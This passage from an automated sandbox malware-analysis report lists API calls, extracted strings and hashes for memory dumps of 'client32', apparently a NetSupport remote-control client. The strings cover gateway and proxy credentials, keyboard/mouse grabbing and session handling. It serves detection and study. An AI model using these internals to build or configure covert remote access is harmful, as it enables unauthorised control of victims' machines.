                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F657D
                                                                                                                                        • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F658E
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F659E
                                                                                                                                        • _memset.LIBCMT ref: 688F65C8
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,688FD77B,00000000), ref: 688F65D7
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,00000000,?,688FD77B,00000000), ref: 688F65F2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                                                        • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                                        • API String ID: 3764039262-2631155478
                                                                                                                                        • Opcode ID: 5c078b11553b888c01c370bfd7d5f276d3ee81a15f80224ebe2d0a924e91fc53
                                                                                                                                        • Instruction ID: dde2406876a8e83c0fbdedb7ae9d955062f90e98ca318415a9f1f64cf82324c9
                                                                                                                                        • Opcode Fuzzy Hash: 5c078b11553b888c01c370bfd7d5f276d3ee81a15f80224ebe2d0a924e91fc53
                                                                                                                                        • Instruction Fuzzy Hash: 2951D675648704AFD730EF68CC84B5A73B9BF99354F900A24E656D7680DB70E841CB61

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strncmp
                                                                                                                                        • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                                        • API String ID: 909875538-2848211065
                                                                                                                                        • Opcode ID: 123840faa9e8efcda33684dcddd627202ced4133cd3ba9de48db8a8e09353959
                                                                                                                                        • Instruction ID: 880c00f872e8ad3f5935cf0b4977df4ad80d07a322ffb67a06d7093f0a3afb03
                                                                                                                                        • Opcode Fuzzy Hash: 123840faa9e8efcda33684dcddd627202ced4133cd3ba9de48db8a8e09353959
                                                                                                                                        • Instruction Fuzzy Hash: ABD1E775A042299FDB20CF68CC84BEDB774AF4A348F8045E9D85D9B242D731DA86CF51

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74A91370,?,0000001A), ref: 1102837D
                                                                                                                                        • _strrchr.LIBCMT ref: 1102838C
                                                                                                                                          • Part of subcall function 11160E4E: __stricmp_l.LIBCMT ref: 11160E8B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                        • API String ID: 1609618855-357498123

                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906BD5
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906C26
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 68906C5B
                                                                                                                                          • Part of subcall function 68906940: GetTickCount.KERNEL32 ref: 68906950
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000318,?), ref: 68906C7C
                                                                                                                                        • _memmove.LIBCMT ref: 68906C93
                                                                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 68906CB4
                                                                                                                                        • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 68906CD9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906CEC
                                                                                                                                        • _calloc.LIBCMT ref: 68906D76
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906DF3
                                                                                                                                        • InterlockedExchange.KERNEL32(025E2F82,00000000), ref: 68906E01
                                                                                                                                        • _calloc.LIBCMT ref: 68906E33
                                                                                                                                        • _memmove.LIBCMT ref: 68906E47
                                                                                                                                        • InterlockedDecrement.KERNEL32(025E2F2A), ref: 68906EC3
                                                                                                                                        • SetEvent.KERNEL32(00000314), ref: 68906ECF
                                                                                                                                        • _memmove.LIBCMT ref: 68906EF4
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906F4F
                                                                                                                                        • InterlockedExchange.KERNEL32(025E2ECA,-6893A188), ref: 68906F60
                                                                                                                                        Strings
                                                                                                                                        • FALSE, xrefs: 68906E67
                                                                                                                                        • ProcessMessage returned FALSE. Terminating connection, xrefs: 68906F25
                                                                                                                                        • ReadMessage returned FALSE. Terminating connection, xrefs: 68906F3A
                                                                                                                                        • ResumeTimeout, xrefs: 68906BBA
                                                                                                                                        • httprecv, xrefs: 68906BDD
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68906E62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                                                        • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                                        • API String ID: 1449423504-919941520

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1108592C
                                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
                                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
                                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
                                                                                                                                        • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                                        • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                                        • API String ID: 2201880244-3035937465

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                        • GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                        • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 11105EDB
                                                                                                                                          • Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7736C3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
                                                                                                                                          • Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                          • Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                          • Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11105EEF
                                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
                                                                                                                                        • InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26
                                                                                                                                          • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                          • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69
                                                                                                                                          • Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                          • Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                          • Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
                                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_memsetwsprintf
                                                                                                                                        • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                                                        • API String ID: 539809342-403456261
                                                                                                                                        • Opcode ID: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
                                                                                                                                        • Instruction ID: 98d48469d2e7b61091a73167657919c28ab3cbb48a1ba220805b109c32019478
                                                                                                                                        • Opcode Fuzzy Hash: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
                                                                                                                                        • Instruction Fuzzy Hash: 6981B1B1E007569FDB51CFB48C89BAAFBE5BB08308F10857DE569D7280D7706A40CB12
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76938400), ref: 11141740
                                                                                                                                          • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                          • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
                                                                                                                                          • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
                                                                                                                                        • PostMessageA.USER32(0001044C,000006CF,00000007,00000000), ref: 1113623F
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • SetWindowTextA.USER32(0001044C,00000000), ref: 111362E7
                                                                                                                                        • IsWindowVisible.USER32(0001044C), ref: 111363AC
                                                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
                                                                                                                                        • IsWindowVisible.USER32(0001044C), ref: 111363DA
                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 11136408
                                                                                                                                        • EnableWindow.USER32(0001044C,00000001), ref: 11136417
                                                                                                                                        • IsWindowVisible.USER32(0001044C), ref: 11136468
                                                                                                                                        • IsWindowVisible.USER32(0001044C), ref: 11136475
                                                                                                                                        • EnableWindow.USER32(0001044C,00000000), ref: 11136489
                                                                                                                                        • EnableWindow.USER32(0001044C,00000000), ref: 111363EF
                                                                                                                                          • Part of subcall function 1112E330: ShowWindow.USER32(0001044C,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354
                                                                                                                                        • EnableWindow.USER32(0001044C,00000001), ref: 1113649D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                                                        • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                        • API String ID: 3453649892-3803836183
                                                                                                                                        • Opcode ID: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                                        • Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
                                                                                                                                        • Opcode Fuzzy Hash: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
                                                                                                                                        • Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000000C), ref: 11073B95
                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000024), ref: 11073B9B
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000003C), ref: 11073BA1
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000DB1C), ref: 11073BAA
                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000054), ref: 11073BB0
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000006C), ref: 11073BB6
                                                                                                                                        • _strncpy.LIBCMT ref: 11073C18
                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,00000001,00000000), ref: 11073C7F
                                                                                                                                        • CreateThread.KERNEL32(00000000,00004000,Function_0006FD70,00000000,00000000,?), ref: 11073D1C
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000001,00000000), ref: 11073D23
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInitializeSection$CloseCreateEnvironmentErrorExitExpandHandleLastMessageProcessStringsThread_strncpywsprintf
                                                                                                                                        • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL$tj
                                                                                                                                        • API String ID: 2176893583-624511195
                                                                                                                                        • Opcode ID: 889e2c9f85ea8016a32cb5deea05d580a90b4bcc58e6bc18f7868a3592ec7294
                                                                                                                                        • Instruction ID: 96e53a99b37afd88effbccddcb99d5044153cbf19089882f4136f072ae1633ca
                                                                                                                                        • Opcode Fuzzy Hash: 889e2c9f85ea8016a32cb5deea05d580a90b4bcc58e6bc18f7868a3592ec7294
                                                                                                                                        • Instruction Fuzzy Hash: 6A71EAB1B00309AFE711DBA4CC85FE9F7B5BB88704F0084A9E3159B281EB70B944CB65
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 11030457
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 11030465
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                        • InterlockedExchange.KERNEL32(02378DB8,00001388), ref: 11030746
                                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
                                                                                                                                        • String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
                                                                                                                                        • API String ID: 711497182-3782231422
                                                                                                                                        • Opcode ID: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
                                                                                                                                        • Instruction ID: f63cb038d00ac44cf3594e94df0c2f2de2f1e5b42f8671348dba24db1a15b590
                                                                                                                                        • Opcode Fuzzy Hash: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
                                                                                                                                        • Instruction Fuzzy Hash: 59D172B0D16369DEDF02CBB48C447EDBEF5AB8430CF1001A6D849A7289F7755A84CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76938400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 110303C3
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                        • InterlockedExchange.KERNEL32(02378DB8,00001388), ref: 11030746
                                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                          • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue__isdigit_l
                                                                                                                                        • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
                                                                                                                                        • API String ID: 3298063328-2190704750
                                                                                                                                        • Opcode ID: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
                                                                                                                                        • Instruction ID: 9f43229105984b1126c86cbd82377d9c7f2924e853b9011d381d79a7883068f9
                                                                                                                                        • Opcode Fuzzy Hash: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
                                                                                                                                        • Instruction Fuzzy Hash: E0D1F8B0D163599FEB11CBA48C84BAEFBF5AB8430CF1041E9D449A7288FB715A44CB52
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf
                                                                                                                                        • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                                                                        • API String ID: 2111968516-2157635994
                                                                                                                                        • Opcode ID: 05ae1cdb36dcba4c5c5e59d05f4c1d966c9c281825f63852be7726969dee5ac9
                                                                                                                                        • Instruction ID: 8a82afb8f24d933412636874f05d629eae6ad4827dbe6e245a1133ec756b8fe8
                                                                                                                                        • Opcode Fuzzy Hash: 05ae1cdb36dcba4c5c5e59d05f4c1d966c9c281825f63852be7726969dee5ac9
                                                                                                                                        • Instruction Fuzzy Hash: 622286B2A04368AFDB20CBA8CC80EEEB7BDAB49304F8485DDE55967540D6319F85CF51
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(PCIINV.DLL,A0A8B03E,02616A48,02616A38,?,00000000,1117ED9C,000000FF,?,11031392,02616A48,00000000,?,?,?), ref: 11084F85
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                          • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
                                                                                                                                        • wsprintfA.USER32 ref: 1108505B
                                                                                                                                        • wsprintfA.USER32 ref: 11085072
                                                                                                                                        • wsprintfA.USER32 ref: 11085089
                                                                                                                                        • CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA
                                                                                                                                          • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,7622F550,?,?,11085200,?,11031392,02616A48,00000000,?,?,?), ref: 11084BD8
                                                                                                                                          • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,7622F550,?,?,11085200,?,11031392,02616A48,00000000,?,?,?), ref: 11084BEB
                                                                                                                                          • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,7622F550,?,?,11085200,?,11031392,02616A48,00000000,?,?,?), ref: 11084BFE
                                                                                                                                          • Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,7622F550,?,?,11085200,?,11031392,02616A48,00000000,?,?,?), ref: 11084C11
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_memset
                                                                                                                                        • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                        • API String ID: 3281479988-2492245516
                                                                                                                                        • Opcode ID: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
                                                                                                                                        • Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
                                                                                                                                        • Opcode Fuzzy Hash: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
                                                                                                                                        • Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91
                                                                                                                                        APIs
                                                                                                                                        • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
                                                                                                                                        • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                        • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                        • API String ID: 2061479752-1320826866
                                                                                                                                        • Opcode ID: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
                                                                                                                                        • Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
                                                                                                                                        • Opcode Fuzzy Hash: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
                                                                                                                                        • Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61
                                                                                                                                          • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                                        • wsprintfA.USER32 ref: 11027E84
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
